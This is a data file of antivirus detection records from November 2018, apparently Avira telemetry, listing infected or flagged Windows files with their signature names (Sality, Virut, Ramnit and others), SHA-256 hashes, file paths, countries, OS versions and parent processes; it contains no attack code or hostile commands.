  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T13:59:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tubetools_458ecf5.exe', filepath='E:\\TUBETOOLS_458ECF5.EXE', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='be57411ce50887ba2525a238649ebf3c5d31c21ff44f725b30eb7d725f8db271', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T23:53:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ef6f1de7aa10e982afb7178ec92379054424e1d7b39748466133bab9999285a0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\EF6F1DE7AA10E982AFB7178EC92379054424E1D7B39748466133BAB9999285A0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ef6f1de7aa10e982afb7178ec92379054424e1d7b39748466133bab9999285a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kexindll.dll', filepath='D:\\SVN_HK\\doc\\通道配置\\北京HX通道\\通道程序\\kexindll.dll', filesize=5376000, name='TR/Black.Gen2.#M300.#R100338'), hash='996de373c60de4b03c78b8968f2e7fb536ed116901aa54591ba971770a551e95', metadata=Row(cmdline='\\\\\\/command:update \\\\\\/pathfile:\\\\\\"C:\\\\\\\\Users\\\\\\\\cr\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\svnE3DF.tmp\\\\\\" \\\\\\/deletepathfile \\\\\\/hwnd:0000000000050A54', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\TortoiseSVN\\bin\\TortoiseProc.exe', parentsize=8142584, timestamp='2018-11-01T12:48:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215815-46d017bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215815-46D017BD', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f_000361', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000361', filesize=280000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='551122d9c5eb30aa0eee374362ea6336e093854a0efc1be403447b1fc5bf9b8d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T13:07:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='computerdefaults.exe', filepath='\\\\?\\C:\\Windows\\System32\\ComputerDefaults.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a17d51471e68aa036792002d09d08b75e483d84eda16739098d3cc5d522feabd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111732-2c473b26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111732-2C473B26', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b81d81cc96bfcfcaadc71383f3141ebd88eb449eb08d4173e94514d4ee30f2a0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B81D81CC96BFCFCAADC71383F3141EBD88EB449EB08D4173E94514D4EE30F2A0', filesize=896000, name='TR/Kryptik.cqkbr.#M1.#R1'), hash='b81d81cc96bfcfcaadc71383f3141ebd88eb449eb08d4173e94514d4ee30f2a0', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:22:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200305-48bc81ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20487899\\AVSCAN-20181101-200147-3EDC30CF\\AVSCAN-20181101-200305-48BC81AD', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='acu4.exe', filepath='\\\\?\\C:\\NAPRO\\PC-SCAN3000 USB\\AIRBAG\\ACU4.exe', filesize=2496000, name='HEUR/APC.#M1.#R1'), hash='5d0057bb9bb9a05157cb1e2715a23c0699dcb453c6154dafe485afe01c5b3280', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170707-961fe22b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bd561203\\AVSCAN-20181029-071119-BE26F8EF\\AVSCAN-20181101-170707-961FE22B', filesize=776000, name='PUA/SearchProtect.#M1.#R1'), hash='df6f18bce3dc95ea14da9545229330467cb5459ab63b05c1d994a48297905b4f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T05:02:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eppcceul.exe', filepath='D:\\Users\\X\\AppData\\Local\\Temp\\EPSON\\FirstAidKit\\EpsonPrinterConnectionChecker_V210_22\\EPPCCEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='e07b32cba42f2c7237feae98fe9786f1fd3b92734439078fe704d80668317a5c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T04:20:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123223-a24d462b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123201-8F9BD7B1\\AVSCAN-20181101-123223-A24D462B', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110233-badbad25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110233-BADBAD25', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='presence.exe', filepath='C:\\Users\\X\\Desktop\\Images\\Presence\\Presence.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:IRUtyC\\\\\\/ZIEW+9+\\\\\\/K.1', country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T13:49:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zuma&mb.exe', filepath='F:\\MaZiKa2daY.CoM.Top.Zuma.By.IneXaTo\\Zuma&MB.exe', filesize=5312000, name='W32/Sality.AT.#M1.#R1'), hash='73c0214f39025fde2b7a986da191476396bab4375e65541fd9257d9d119e3074', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T20:36:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:32:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003221-78a1fe1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003221-78A1FE1B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003235-7a1d4741', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003235-7A1D4741', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T15:18:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105619-b9dbeb06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b5741c0\\AVSCAN-20181101-105610-B7F691A7\\AVSCAN-20181101-105619-B9DBEB06', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:56:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:56:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0008725.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0008725.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:37:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233540-8a14ad74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1467acaa\\AVSCAN-20181101-233526-8772A505\\AVSCAN-20181101-233540-8A14AD74', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:36:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aamlauncher.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\UWA\\AAMLauncher.exe', filesize=524000, name='W32/Sality.AT.#M1.#R1'), hash='1f9a73633dd9f7c06e58cf7837f73fbf7bad50f5d7b3ed69559267f21f991c0f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:01:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110310-523a369a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a58325cc\\AVSCAN-20181101-104841-9771798C\\AVSCAN-20181101-110310-523A369A', filesize=176000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='83b76da691e636406e3c4c0fa4e7bcc49012feffcad1201b166eff8c8d1a6d0a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:03:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220203-aab02653', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49097240\\AVSCAN-20181101-220128-A59AE332\\AVSCAN-20181101-220203-AAB02653', filesize=256000, name='TR/Dldr.Banload.ayiz.#M1.#R1'), hash='3a137704e3917c211564af0fd9f7201ab6c3211b15c88a301f308e961aee729b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:32:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004243', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00004243', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='129c87278ccf88c8d473234adad580110c32c77ace9bd7cd989d3aeae006bfb9', metadata=Row(cmdline=None, country='GA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T04:32:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0026172.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{726DFCED-3DF5-404C-B3E0-BCC96F47927F}\\RP8\\A0026172.exe', filesize=128000, name='TR/Patched.Ren.Gen.#M300.#R5151'), hash='57d0421ad6cf40ffcf8da7ebd2f867b2e4eca9642752c8f18d99337347722f9e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:35:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0007e088', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp0007e088', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:44:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:17:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194601-bf73f7a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b59c424\\AVSCAN-20181101-194545-BC761FCE\\AVSCAN-20181101-194601-BF73F7A6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:46:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090823-19a6becc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224711-AF384F40\\AVSCAN-20181102-090823-19A6BECC', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='176270a307e14ce313c8f00b8f5c7b5464188de5e17c2e042f7d1d65fc611230', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:29:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-092604-b5ae03d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181102-091734-6AAEB4B9\\AVSCAN-20181102-092604-B5AE03D5', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:51:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184422-bfb87b4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6698749\\AVSCAN-20181101-184406-BC9FBECC\\AVSCAN-20181101-184422-BFB87B4E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:44:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crmnmhkp.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CRmnMHKP.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:09:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f370a3333b03bd9e1aa31d37e6a554daa0cda0193e141ce4571c983f85df557d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\F370A3333B03BD9E1AA31D37E6A554DAA0CDA0193E141CE4571C983F85DF557D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f370a3333b03bd9e1aa31d37e6a554daa0cda0193e141ce4571c983f85df557d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mohaa.exe', filepath='\\?\\J:\\Medal of honor\\MOHAA.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='ae672c8c0083cd627f429b8212d116e07bff3be93a07379ccae9d14abc11b251', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='errlook.exe', filepath='H:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\Common7\\Tools\\errlook.exe', filesize=100000, name='W32/Neshta.A.#M1.#R1'), hash='cd72af8b4850a697f60bd5c0c78a15bb638c3adbff0c269d8697d139b2b544cd', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:09:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\viykmlrd5gz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:16:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152536-25b5c1a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_782bea3d\\AVSCAN-20181101-152455-2082CB32\\AVSCAN-20181101-152536-25B5C1A6', filesize=320000, name='HEUR/AGEN.1002500.#M1.#R1'), hash='cd8fd5025afea49431ecd64a461374d6552d796e4fb43b042f484f8e7d426d5e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:25:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T03:12:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='admin.exe', filepath='E:\\PENTA 14-09-2016\\admin.exe', filesize=6720000, name='W32/Almanahe.D.#M1.#R1'), hash='9f9c4216b3ab8471f0ffbdcd2556b8730d613cb1675bfa3271a287600294555f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:12:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a6afd06f85cf749ac48dd19ccce842ec5251a0ec026e44c4159b0f2e0ace8602', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\A6AFD06F85CF749AC48DD19CCCE842EC5251A0EC026E44C4159B0F2E0ACE8602', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a6afd06f85cf749ac48dd19ccce842ec5251a0ec026e44c4159b0f2e0ace8602', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:49:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='c44f13f23dc49051f7019146bd18bc757a3db82126eab46def3d50ea5e17a1d8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:49:23Z'), dt=datetime.date(2018, 11, 1)),
